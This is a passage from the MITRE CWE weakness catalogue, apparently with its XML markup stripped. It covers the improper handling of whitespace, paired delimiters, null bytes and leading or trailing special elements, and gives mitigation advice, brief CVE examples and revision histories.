rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-0637 + MIE. virus protection bypass with RFC violations involving extra whitespace, or missing whitespace. + https://www.cve.org/CVERecord?id=CVE-2002-0637 + + + CVE-2004-0942 + CPU consumption with MIME headers containing lines with many space characters, probably due to algorithmic complexity (RESOURCE.AMP.ALG). + https://www.cve.org/CVERecord?id=CVE-2004-0942 + + + CVE-2003-1015 + MIE. whitespace interpreted differently by mail clients. + https://www.cve.org/CVERecord?id=CVE-2003-1015 + + + + + SPEC.WHITESPACE + Whitespace + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Can overlap other separator characters or delimiters. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Whitespace + Failure to Remove Whitespace + Failure to Sanitize Whitespace + Improper Sanitization of Whitespace + + + + The product does not properly handle the characters that are used to mark the beginning and ending of a group of entities, such as parentheses, brackets, and braces. + + Paired delimiters might include: + + < and > angle brackets + ( and ) parentheses + { and } braces + [ and ] square brackets + " " double quotes + ' ' single quotes + + + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that grouping elements will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2004-0956 + Crash via missing paired delimiter (open double-quote but no closing double-quote). + https://www.cve.org/CVERecord?id=CVE-2004-0956 + + + CVE-2000-1165 + Crash via message without closing ">". + https://www.cve.org/CVERecord?id=CVE-2000-1165 + + + CVE-2005-2933 + Buffer overflow via mailbox name with an opening double quote but missing a closing double quote, causing a larger copy than expected. + https://www.cve.org/CVERecord?id=CVE-2005-2933 + + + + + Grouping Element / Paired Delimiter + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-studied. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Applicable_Platforms, Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Grouping Element / Paired Delimiter + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes NUL characters or null bytes when they are sent to a downstream component. + As data is parsed, an injected NUL character or null byte may cause the product to believe the input is terminated earlier than it actually is, or otherwise cause the input to be misinterpreted. This could then be used to inject potentially dangerous input that occurs after the null byte or otherwise bypass validation routines and other protection mechanisms. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that null characters or null bytes will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2008-1284 + NUL byte in theme name causes directory traversal impact to be worse + https://www.cve.org/CVERecord?id=CVE-2008-1284 + + + CVE-2005-2008 + Source code disclosure using trailing null. + https://www.cve.org/CVERecord?id=CVE-2005-2008 + + + CVE-2005-3293 + Source code disclosure using trailing null. + https://www.cve.org/CVERecord?id=CVE-2005-3293 + + + CVE-2005-2061 + Trailing null allows file include. + https://www.cve.org/CVERecord?id=CVE-2005-2061 + + + CVE-2002-1774 + Null character in MIME header allows detection bypass. + https://www.cve.org/CVERecord?id=CVE-2002-1774 + + + CVE-2000-0149 + Web server allows remote attackers to view the source code for CGI programs via a null character (%00) at the end of a URL. + https://www.cve.org/CVERecord?id=CVE-2000-0149 + + + CVE-2000-0671 + Web server earlier allows allows remote attackers to bypass access restrictions, list directory contents, and read source code by inserting a null character (%00) in the URL. + https://www.cve.org/CVERecord?id=CVE-2000-0671 + + + CVE-2001-0738 + Logging system allows an attacker to cause a denial of service (hang) by causing null bytes to be placed in log messages. + https://www.cve.org/CVERecord?id=CVE-2001-0738 + + + CVE-2001-1140 + Web server allows source code for executable programs to be read via a null character (%00) at the end of a request. + https://www.cve.org/CVERecord?id=CVE-2001-1140 + + + CVE-2002-1031 + Protection mechanism for limiting file access can be bypassed using a null character (%00) at the end of the directory name. + https://www.cve.org/CVERecord?id=CVE-2002-1031 + + + CVE-2002-1025 + Application server allows remote attackers to read JSP source code via an encoded null byte in an HTTP GET request, which causes the server to send the .JSP file unparsed. + https://www.cve.org/CVERecord?id=CVE-2002-1025 + + + CVE-2003-0768 + XSS protection mechanism only checks for sequences with an alphabetical character following a (<), so a non-alphabetical or null character (%00) following a < may be processed. + https://www.cve.org/CVERecord?id=CVE-2003-0768 + + + CVE-2004-0189 + Decoding function in proxy allows regular expression bypass in ACLs via URLs with null characters. + https://www.cve.org/CVERecord?id=CVE-2004-0189 + + + CVE-2005-3153 + Null byte bypasses PHP regexp check (interaction error). + https://www.cve.org/CVERecord?id=CVE-2005-3153 + + + CVE-2005-4155 + Null byte bypasses PHP regexp check (interaction error). + https://www.cve.org/CVERecord?id=CVE-2005-4155 + + + + + Null Character / Null Byte + + + 28 + Null Byte Injection + + + SFP24 + Tainted input to command + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This can be a factor in multiple interpretation errors, other interaction errors, filename equivalence, etc. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Null Character / Null Byte + Failure to Remove Null Character / Null Byte + Failure to Sanitize Null Byte or NUL Character + + + + The product does not properly filter, remove, quote, or otherwise manage the invalid use of special elements in user-controlled input, which could cause adverse effect on its behavior and integrity. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Common Special Element Manipulations + + + SFP24 + Tainted input to command + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + The list of children for this entry is far from complete. However, the types of special elements might be too precise for use within CWE. + Precise terminology for the underlying weaknesses does not exist. Therefore, these weaknesses use the terminology associated with the manipulation. + Customized languages and grammars, even those that are specific to a particular product, are potential sources of weaknesses that are related to special elements. However, most researchers concentrate on the most commonly used representations for data transmission, such as HTML and SQL. Any representation that is commonly used is likely to be a rich source of weaknesses; researchers are encouraged to investigate previously unexplored representations. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-10-29 + updated Maintenance_Notes, Other_Notes, Terminology_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Common Special Element Manipulations + Failure to Sanitize Special Element + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component. + As data is parsed, improperly handled leading special elements may cause the process to take unexpected actions that result in an attack. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that leading special elements will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Leading Special Element + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Leading Special Element + Failure to Sanitize Leading Special Element + Improper Sanitization of Leading Special Elements + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component. + As data is parsed, improperly handled multiple leading special elements may cause the process to take unexpected actions that result in an attack. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that multiple leading special elements will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Multiple Leading Special Elements + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Multiple Leading Special Elements + Failure to Sanitize Multiple Leading Special Elements + Improper Sanitization of Multiple Leading Special Elements + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component. + As data is parsed, improperly handled trailing special elements may cause the process to take unexpected actions that result in an attack. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that trailing special elements will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Trailing Special Element + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Trailing Special Element + Failure to Sanitize Trailing Special Element + Improper Sanitization of Trailing Special Elements + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component. + As data is parsed, improperly handled multiple trailing special elements may cause the process to take unexpected actions that result in an attack. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that multiple trailing special elements will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Multiple Trailing Special Elements + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated 